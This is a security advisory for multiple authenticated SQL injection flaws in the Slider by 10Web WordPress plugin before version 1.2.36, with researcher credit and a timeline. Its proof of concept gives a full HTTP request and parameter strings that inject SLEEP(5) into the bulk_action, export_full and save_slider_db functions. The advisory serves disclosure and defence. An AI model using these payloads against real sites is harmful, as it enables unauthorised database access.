Slider by 10Web < 1.2.36 - Multiple Authenticated SQL Injection
Description
The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if "Role Options" is turn on for other users) to perform a SQL Injection attacks.
Proof of Concept
Vulnerable param: `check[]` Vulnerable function: WDW_S_Library::get ``` POST /wp-admin/admin.php?page=sliders_wds HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 201 s=&bulk_action=duplicate&check%5BSLEEP(5)%5D=on&select_slider_merge=-select-&imagesexport=on&nonce_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task=duplicate¤t_id= ``` Other SQLi: - File: admin/models/WDSModelWDSExport.php - Function: export_full - Params: slider_ids_string - PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5 - File: admin/controllers/Sliders.php - Function: save_slider_db - Params: del_slide_ids_string - PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5
Affects Plugins
Fixed in version 1.2.36✓
Classification
Miscellaneous
Original Researcher
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter
Nguyen Anh Tien
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2020-09-29 (about 1 years ago)
Added
2020-09-29 (about 1 years ago)
Last Updated
2021-01-21 (about 10 months ago)